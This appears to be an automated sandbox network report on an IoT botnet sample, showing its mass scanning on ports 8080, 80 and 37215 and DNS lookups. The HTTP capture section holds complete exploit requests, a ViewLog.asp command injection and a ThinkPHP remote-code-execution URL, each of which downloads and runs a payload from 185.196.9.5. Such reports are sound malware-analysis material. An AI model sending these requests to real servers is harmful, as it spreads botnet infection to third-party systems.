Feb 25, 2024 19:02:19.572339058 CET	6758	8080	192.168.2.15	94.109.67.226
Feb 25, 2024 19:02:19.572333097 CET	6758	8080	192.168.2.15	62.82.131.58
Feb 25, 2024 19:02:19.572333097 CET	6758	8080	192.168.2.15	95.126.219.215
Feb 25, 2024 19:02:19.572333097 CET	6758	8080	192.168.2.15	85.132.199.57
Feb 25, 2024 19:02:19.572339058 CET	6758	8080	192.168.2.15	85.167.112.151
Feb 25, 2024 19:02:19.572333097 CET	6758	8080	192.168.2.15	62.127.207.82
Feb 25, 2024 19:02:19.572339058 CET	6758	8080	192.168.2.15	94.109.115.16
Feb 25, 2024 19:02:19.572339058 CET	6758	8080	192.168.2.15	85.105.73.159
Feb 25, 2024 19:02:19.572357893 CET	6758	8080	192.168.2.15	62.63.112.236
Feb 25, 2024 19:02:19.572357893 CET	6758	8080	192.168.2.15	85.88.11.67
Feb 25, 2024 19:02:19.572357893 CET	6758	8080	192.168.2.15	62.129.41.30
Feb 25, 2024 19:02:19.572357893 CET	6758	8080	192.168.2.15	94.108.84.181
Feb 25, 2024 19:02:19.572359085 CET	6758	8080	192.168.2.15	85.32.236.94
Feb 25, 2024 19:02:19.572359085 CET	6758	8080	192.168.2.15	62.18.129.206
Feb 25, 2024 19:02:19.572359085 CET	6758	8080	192.168.2.15	94.181.168.238
Feb 25, 2024 19:02:19.572412968 CET	6758	8080	192.168.2.15	85.251.138.21
Feb 25, 2024 19:02:19.572412968 CET	6758	8080	192.168.2.15	62.72.108.217
Feb 25, 2024 19:02:19.572412968 CET	6758	8080	192.168.2.15	95.229.19.48
Feb 25, 2024 19:02:19.572412968 CET	6758	8080	192.168.2.15	62.97.228.135
Feb 25, 2024 19:02:19.572412968 CET	6758	8080	192.168.2.15	62.93.51.211
Feb 25, 2024 19:02:19.572412968 CET	6758	8080	192.168.2.15	85.129.90.101
Feb 25, 2024 19:02:19.572412968 CET	6758	8080	192.168.2.15	31.203.68.112
Feb 25, 2024 19:02:19.572415113 CET	6758	8080	192.168.2.15	31.236.218.8
Feb 25, 2024 19:02:19.572416067 CET	6758	8080	192.168.2.15	94.85.233.14
Feb 25, 2024 19:02:19.572416067 CET	6758	8080	192.168.2.15	62.95.158.53
Feb 25, 2024 19:02:19.572416067 CET	6758	8080	192.168.2.15	85.149.86.182
Feb 25, 2024 19:02:19.572416067 CET	6758	8080	192.168.2.15	95.51.44.106
Feb 25, 2024 19:02:19.572422028 CET	6758	8080	192.168.2.15	31.121.156.30
Feb 25, 2024 19:02:19.572422028 CET	6758	8080	192.168.2.15	62.188.191.22
Feb 25, 2024 19:02:19.572422028 CET	6758	8080	192.168.2.15	94.150.56.89
Feb 25, 2024 19:02:19.572422028 CET	6758	8080	192.168.2.15	85.228.11.30
Feb 25, 2024 19:02:19.572422028 CET	6758	8080	192.168.2.15	31.160.24.220
Feb 25, 2024 19:02:19.572429895 CET	6758	8080	192.168.2.15	94.230.143.168
Feb 25, 2024 19:02:19.572429895 CET	6758	8080	192.168.2.15	85.199.126.6
Feb 25, 2024 19:02:19.572431087 CET	6758	8080	192.168.2.15	85.219.95.221
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	85.139.159.3
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	85.74.110.242
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	85.243.21.88
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	94.79.10.200
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	31.95.64.0
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	95.19.182.7
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	62.99.155.155
Feb 25, 2024 19:02:19.572438002 CET	6758	8080	192.168.2.15	62.51.85.195
Feb 25, 2024 19:02:19.572459936 CET	6758	8080	192.168.2.15	94.190.13.57
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	95.195.208.120
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	62.220.163.246
Feb 25, 2024 19:02:19.572459936 CET	6758	8080	192.168.2.15	85.248.247.137
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	31.50.217.78
Feb 25, 2024 19:02:19.572459936 CET	6758	8080	192.168.2.15	31.184.52.137
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	95.160.104.73
Feb 25, 2024 19:02:19.572459936 CET	6758	8080	192.168.2.15	95.17.152.99
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	62.29.65.141
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	94.159.128.131
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	85.14.21.59
Feb 25, 2024 19:02:19.572460890 CET	6758	8080	192.168.2.15	31.216.252.208
Feb 25, 2024 19:02:19.572473049 CET	6758	8080	192.168.2.15	31.116.158.100
Feb 25, 2024 19:02:19.572473049 CET	6758	8080	192.168.2.15	62.135.230.170
Feb 25, 2024 19:02:19.572473049 CET	6758	8080	192.168.2.15	95.137.63.182
Feb 25, 2024 19:02:19.572473049 CET	6758	8080	192.168.2.15	94.167.197.204
Feb 25, 2024 19:02:19.572474003 CET	6758	8080	192.168.2.15	85.37.154.152
Feb 25, 2024 19:02:19.572474003 CET	6758	8080	192.168.2.15	95.177.47.190
Feb 25, 2024 19:02:19.572474003 CET	6758	8080	192.168.2.15	94.146.129.208
Feb 25, 2024 19:02:19.572474003 CET	6758	8080	192.168.2.15	94.29.38.155
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	85.211.196.245
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	94.248.5.113
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	62.70.236.51
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	31.225.14.164
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	95.6.63.227
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	94.231.142.163
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	94.100.66.253
Feb 25, 2024 19:02:19.572499037 CET	6758	8080	192.168.2.15	62.222.102.173
Feb 25, 2024 19:02:19.572515011 CET	6758	8080	192.168.2.15	62.16.232.231
Feb 25, 2024 19:02:19.572515011 CET	6758	8080	192.168.2.15	31.77.21.40
Feb 25, 2024 19:02:19.572515011 CET	6758	8080	192.168.2.15	31.210.79.230
Feb 25, 2024 19:02:19.572563887 CET	6758	8080	192.168.2.15	95.206.91.183
Feb 25, 2024 19:02:19.572563887 CET	6758	8080	192.168.2.15	95.24.216.86
Feb 25, 2024 19:02:19.572563887 CET	6758	8080	192.168.2.15	94.196.13.224
Feb 25, 2024 19:02:19.572563887 CET	6758	8080	192.168.2.15	94.157.169.189
Feb 25, 2024 19:02:19.572563887 CET	6758	8080	192.168.2.15	95.86.232.113
Feb 25, 2024 19:02:19.572563887 CET	6758	8080	192.168.2.15	85.150.10.218
Feb 25, 2024 19:02:19.572563887 CET	53724	8080	192.168.2.15	62.29.86.189
Feb 25, 2024 19:02:19.572568893 CET	6758	8080	192.168.2.15	31.247.0.15
Feb 25, 2024 19:02:19.572568893 CET	6758	8080	192.168.2.15	85.17.168.74
Feb 25, 2024 19:02:19.572568893 CET	6758	8080	192.168.2.15	31.169.240.190
Feb 25, 2024 19:02:19.572568893 CET	6758	8080	192.168.2.15	85.211.133.215
Feb 25, 2024 19:02:19.572568893 CET	6758	8080	192.168.2.15	62.85.119.122
Feb 25, 2024 19:02:19.572568893 CET	6758	8080	192.168.2.15	62.28.123.17
Feb 25, 2024 19:02:19.572572947 CET	6758	8080	192.168.2.15	95.89.197.218
Feb 25, 2024 19:02:19.572572947 CET	6758	8080	192.168.2.15	62.207.18.45
Feb 25, 2024 19:02:19.572572947 CET	6758	8080	192.168.2.15	95.246.141.76
Feb 25, 2024 19:02:19.572572947 CET	6758	8080	192.168.2.15	95.234.53.93
Feb 25, 2024 19:02:19.572572947 CET	6758	8080	192.168.2.15	95.169.222.1
Feb 25, 2024 19:02:19.572583914 CET	6758	8080	192.168.2.15	31.251.71.9
Feb 25, 2024 19:02:19.572583914 CET	6758	8080	192.168.2.15	31.166.59.55
Feb 25, 2024 19:02:19.572583914 CET	6758	8080	192.168.2.15	31.106.157.73
Feb 25, 2024 19:02:19.572583914 CET	6758	8080	192.168.2.15	31.190.72.231
Feb 25, 2024 19:02:19.572583914 CET	6758	8080	192.168.2.15	94.227.162.210
Feb 25, 2024 19:02:19.572583914 CET	6758	8080	192.168.2.15	31.107.97.198
Feb 25, 2024 19:02:19.572583914 CET	6758	8080	192.168.2.15	85.9.242.79
Feb 25, 2024 19:02:19.572638035 CET	6758	8080	192.168.2.15	62.59.251.41
Feb 25, 2024 19:02:19.572638035 CET	6758	8080	192.168.2.15	31.225.36.116
Feb 25, 2024 19:02:19.572638035 CET	6758	8080	192.168.2.15	95.201.95.125
Feb 25, 2024 19:02:19.572638035 CET	6758	8080	192.168.2.15	95.50.206.2
Feb 25, 2024 19:02:19.572638035 CET	6758	8080	192.168.2.15	62.171.9.177
Feb 25, 2024 19:02:19.572638035 CET	6758	8080	192.168.2.15	62.154.248.152
Feb 25, 2024 19:02:19.572654009 CET	6758	8080	192.168.2.15	95.86.235.155
Feb 25, 2024 19:02:19.572654009 CET	6758	8080	192.168.2.15	94.252.1.21
Feb 25, 2024 19:02:19.572654009 CET	6758	8080	192.168.2.15	95.210.153.129
Feb 25, 2024 19:02:19.572654009 CET	6758	8080	192.168.2.15	85.73.230.80
Feb 25, 2024 19:02:19.572654963 CET	6758	8080	192.168.2.15	31.177.90.141
Feb 25, 2024 19:02:19.572654963 CET	6758	8080	192.168.2.15	95.159.91.213
Feb 25, 2024 19:02:19.572654963 CET	6758	8080	192.168.2.15	95.125.97.188
Feb 25, 2024 19:02:19.572707891 CET	6758	8080	192.168.2.15	85.101.169.234
Feb 25, 2024 19:02:19.572709084 CET	6758	8080	192.168.2.15	62.137.55.253
Feb 25, 2024 19:02:19.572709084 CET	6758	8080	192.168.2.15	95.67.234.109
Feb 25, 2024 19:02:19.572709084 CET	6758	8080	192.168.2.15	95.203.229.121
Feb 25, 2024 19:02:19.572709084 CET	6758	8080	192.168.2.15	31.160.216.95
Feb 25, 2024 19:02:19.572709084 CET	6758	8080	192.168.2.15	62.4.233.162
Feb 25, 2024 19:02:19.572709084 CET	6758	8080	192.168.2.15	85.77.222.128
Feb 25, 2024 19:02:19.572717905 CET	6758	8080	192.168.2.15	85.10.101.34
Feb 25, 2024 19:02:19.572717905 CET	6758	8080	192.168.2.15	31.168.80.50
Feb 25, 2024 19:02:19.572717905 CET	6758	8080	192.168.2.15	31.162.150.245
Feb 25, 2024 19:02:19.572717905 CET	6758	8080	192.168.2.15	62.27.138.66
Feb 25, 2024 19:02:19.572717905 CET	41524	8080	192.168.2.15	94.121.142.20
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	85.203.190.19
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	95.129.120.203
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	95.247.222.159
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	62.218.92.146
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	85.86.224.241
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	85.219.219.111
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	62.79.57.254
Feb 25, 2024 19:02:19.572777987 CET	6758	8080	192.168.2.15	31.241.247.153
Feb 25, 2024 19:02:19.572834969 CET	53282	8080	192.168.2.15	62.72.166.45
Feb 25, 2024 19:02:19.585768938 CET	80	6502	95.101.143.7	192.168.2.15
Feb 25, 2024 19:02:19.585838079 CET	6502	80	192.168.2.15	95.101.143.7
Feb 25, 2024 19:02:19.589569092 CET	80	34598	95.164.112.148	192.168.2.15
Feb 25, 2024 19:02:19.589603901 CET	80	58492	95.86.72.116	192.168.2.15
Feb 25, 2024 19:02:19.589637041 CET	34598	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.589673996 CET	58492	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.600267887 CET	80	6502	95.111.252.228	192.168.2.15
Feb 25, 2024 19:02:19.608757019 CET	80	6502	95.217.108.249	192.168.2.15
Feb 25, 2024 19:02:19.608814001 CET	6502	80	192.168.2.15	95.217.108.249
Feb 25, 2024 19:02:19.609118938 CET	80	6502	95.217.76.252	192.168.2.15
Feb 25, 2024 19:02:19.622370005 CET	80	6502	95.224.121.215	192.168.2.15
Feb 25, 2024 19:02:19.623064041 CET	80	6502	95.87.45.157	192.168.2.15
Feb 25, 2024 19:02:19.623116016 CET	6502	80	192.168.2.15	95.87.45.157
Feb 25, 2024 19:02:19.632973909 CET	80	6502	95.84.209.239	192.168.2.15
Feb 25, 2024 19:02:19.633061886 CET	6502	80	192.168.2.15	95.84.209.239
Feb 25, 2024 19:02:19.670337915 CET	80	6502	95.104.67.21	192.168.2.15
Feb 25, 2024 19:02:19.685679913 CET	80	59884	95.56.25.22	192.168.2.15
Feb 25, 2024 19:02:19.685745955 CET	59884	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:19.695183039 CET	80	55748	95.100.51.55	192.168.2.15
Feb 25, 2024 19:02:19.695259094 CET	55748	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:19.695434093 CET	80	47310	95.90.146.125	192.168.2.15
Feb 25, 2024 19:02:19.695563078 CET	47310	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:19.696556091 CET	80	40908	95.56.81.125	192.168.2.15
Feb 25, 2024 19:02:19.696611881 CET	40908	80	192.168.2.15	95.56.81.125
Feb 25, 2024 19:02:19.772639036 CET	8080	6758	95.249.133.178	192.168.2.15
Feb 25, 2024 19:02:19.779185057 CET	8080	6758	85.202.216.192	192.168.2.15
Feb 25, 2024 19:02:19.872016907 CET	6246	37215	192.168.2.15	197.184.4.177
Feb 25, 2024 19:02:19.872035027 CET	6246	37215	192.168.2.15	197.130.7.200
Feb 25, 2024 19:02:19.872072935 CET	6246	37215	192.168.2.15	197.67.63.23
Feb 25, 2024 19:02:19.872086048 CET	6246	37215	192.168.2.15	197.187.50.128
Feb 25, 2024 19:02:19.872131109 CET	6246	37215	192.168.2.15	197.112.147.177
Feb 25, 2024 19:02:19.872169971 CET	6246	37215	192.168.2.15	197.178.240.193
Feb 25, 2024 19:02:19.872220993 CET	6246	37215	192.168.2.15	197.15.127.75
Feb 25, 2024 19:02:19.872248888 CET	6246	37215	192.168.2.15	197.117.51.66
Feb 25, 2024 19:02:19.872256994 CET	6246	37215	192.168.2.15	197.189.191.214
Feb 25, 2024 19:02:19.872277021 CET	6246	37215	192.168.2.15	197.68.35.216
Feb 25, 2024 19:02:19.872282028 CET	6246	37215	192.168.2.15	197.206.166.78
Feb 25, 2024 19:02:19.872282028 CET	6246	37215	192.168.2.15	197.79.74.26
Feb 25, 2024 19:02:19.872282028 CET	6246	37215	192.168.2.15	197.113.158.60
Feb 25, 2024 19:02:19.872297049 CET	6246	37215	192.168.2.15	197.229.252.9
Feb 25, 2024 19:02:19.872315884 CET	6246	37215	192.168.2.15	197.176.28.249
Feb 25, 2024 19:02:19.872343063 CET	6246	37215	192.168.2.15	197.121.58.151
Feb 25, 2024 19:02:19.872355938 CET	6246	37215	192.168.2.15	197.36.217.19
Feb 25, 2024 19:02:19.872364998 CET	6246	37215	192.168.2.15	197.195.85.61
Feb 25, 2024 19:02:19.872368097 CET	6246	37215	192.168.2.15	197.123.220.126
Feb 25, 2024 19:02:19.872390032 CET	6246	37215	192.168.2.15	197.76.47.209
Feb 25, 2024 19:02:19.872390032 CET	6246	37215	192.168.2.15	197.41.69.4
Feb 25, 2024 19:02:19.872402906 CET	6246	37215	192.168.2.15	197.165.136.114
Feb 25, 2024 19:02:19.872409105 CET	6246	37215	192.168.2.15	197.18.37.11
Feb 25, 2024 19:02:19.872420073 CET	6246	37215	192.168.2.15	197.1.201.179
Feb 25, 2024 19:02:19.872422934 CET	6246	37215	192.168.2.15	197.199.103.139
Feb 25, 2024 19:02:19.872458935 CET	6246	37215	192.168.2.15	197.66.198.142
Feb 25, 2024 19:02:19.872464895 CET	6246	37215	192.168.2.15	197.126.194.174
Feb 25, 2024 19:02:19.872464895 CET	6246	37215	192.168.2.15	197.4.51.14
Feb 25, 2024 19:02:19.872476101 CET	6246	37215	192.168.2.15	197.77.36.170
Feb 25, 2024 19:02:19.872478008 CET	6246	37215	192.168.2.15	197.74.60.72
Feb 25, 2024 19:02:19.872497082 CET	6246	37215	192.168.2.15	197.15.215.50
Feb 25, 2024 19:02:19.872504950 CET	6246	37215	192.168.2.15	197.240.3.219
Feb 25, 2024 19:02:19.872509956 CET	6246	37215	192.168.2.15	197.33.213.7
Feb 25, 2024 19:02:19.872510910 CET	6246	37215	192.168.2.15	197.48.34.150
Feb 25, 2024 19:02:19.872522116 CET	6246	37215	192.168.2.15	197.8.160.205
Feb 25, 2024 19:02:19.872545004 CET	6246	37215	192.168.2.15	197.203.122.251
Feb 25, 2024 19:02:19.872546911 CET	6246	37215	192.168.2.15	197.188.175.78
Feb 25, 2024 19:02:19.872555017 CET	6246	37215	192.168.2.15	197.156.57.223
Feb 25, 2024 19:02:19.872559071 CET	6246	37215	192.168.2.15	197.2.128.87
Feb 25, 2024 19:02:19.872574091 CET	6246	37215	192.168.2.15	197.240.180.181
Feb 25, 2024 19:02:19.872587919 CET	6246	37215	192.168.2.15	197.224.41.222
Feb 25, 2024 19:02:19.872591972 CET	6246	37215	192.168.2.15	197.37.66.162
Feb 25, 2024 19:02:19.872611046 CET	6246	37215	192.168.2.15	197.254.210.82
Feb 25, 2024 19:02:19.872613907 CET	6246	37215	192.168.2.15	197.68.199.93
Feb 25, 2024 19:02:19.872631073 CET	6246	37215	192.168.2.15	197.200.36.25
Feb 25, 2024 19:02:19.872632027 CET	6246	37215	192.168.2.15	197.227.147.100
Feb 25, 2024 19:02:19.872651100 CET	6246	37215	192.168.2.15	197.180.57.5
Feb 25, 2024 19:02:19.872651100 CET	6246	37215	192.168.2.15	197.14.115.13
Feb 25, 2024 19:02:19.872668982 CET	6246	37215	192.168.2.15	197.205.206.212
Feb 25, 2024 19:02:19.872673035 CET	6246	37215	192.168.2.15	197.171.193.193
Feb 25, 2024 19:02:19.872689962 CET	6246	37215	192.168.2.15	197.177.32.176
Feb 25, 2024 19:02:19.872694969 CET	6246	37215	192.168.2.15	197.1.239.181
Feb 25, 2024 19:02:19.872708082 CET	6246	37215	192.168.2.15	197.103.38.61
Feb 25, 2024 19:02:19.872714043 CET	6246	37215	192.168.2.15	197.53.122.123
Feb 25, 2024 19:02:19.872728109 CET	6246	37215	192.168.2.15	197.250.191.3
Feb 25, 2024 19:02:19.872739077 CET	6246	37215	192.168.2.15	197.202.9.171
Feb 25, 2024 19:02:19.872745991 CET	6246	37215	192.168.2.15	197.205.18.17
Feb 25, 2024 19:02:19.872759104 CET	6246	37215	192.168.2.15	197.129.63.94
Feb 25, 2024 19:02:19.872771025 CET	6246	37215	192.168.2.15	197.185.78.19
Feb 25, 2024 19:02:19.872781038 CET	6246	37215	192.168.2.15	197.0.142.56
Feb 25, 2024 19:02:19.872800112 CET	6246	37215	192.168.2.15	197.35.36.249
Feb 25, 2024 19:02:19.872812986 CET	6246	37215	192.168.2.15	197.182.211.52
Feb 25, 2024 19:02:19.872823954 CET	6246	37215	192.168.2.15	197.173.1.161
Feb 25, 2024 19:02:19.872838974 CET	6246	37215	192.168.2.15	197.48.40.132
Feb 25, 2024 19:02:19.872850895 CET	6246	37215	192.168.2.15	197.180.81.89
Feb 25, 2024 19:02:19.872864008 CET	6246	37215	192.168.2.15	197.39.239.76
Feb 25, 2024 19:02:19.872864008 CET	6246	37215	192.168.2.15	197.195.70.201
Feb 25, 2024 19:02:19.872885942 CET	6246	37215	192.168.2.15	197.83.138.79
Feb 25, 2024 19:02:19.872886896 CET	6246	37215	192.168.2.15	197.209.161.160
Feb 25, 2024 19:02:19.872895002 CET	6246	37215	192.168.2.15	197.101.154.135
Feb 25, 2024 19:02:19.872910976 CET	6246	37215	192.168.2.15	197.219.57.95
Feb 25, 2024 19:02:19.872915983 CET	6246	37215	192.168.2.15	197.12.129.44
Feb 25, 2024 19:02:19.872931004 CET	6246	37215	192.168.2.15	197.114.96.165

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 25, 2024 19:04:58.097217083 CET	192.168.2.15	1.1.1.1	0x54b7	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Feb 25, 2024 19:04:58.097340107 CET	192.168.2.15	1.1.1.1	0x6561	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 25, 2024 19:04:58.296267986 CET	1.1.1.1	192.168.2.15	0x54b7	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false
Feb 25, 2024 19:04:58.296267986 CET	1.1.1.1	192.168.2.15	0x54b7	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.15	44732	94.123.6.73	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:18.120693922 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.15	32822	94.121.100.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:18.346226931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.15	54734	95.85.27.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.062601089 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.15	59244	95.217.209.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.082058907 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.279444933 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.15	48418	95.217.145.162	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.082096100 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.279473066 CET	504	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 310 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 65 78 74 63 6c 6f 75 64 2e 62 72 74 6d 72 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at nextcloud.brtmr.de Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.15	58466	95.86.72.116	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.121186972 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.15	55722	95.100.51.55	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.139225960 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.471172094 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
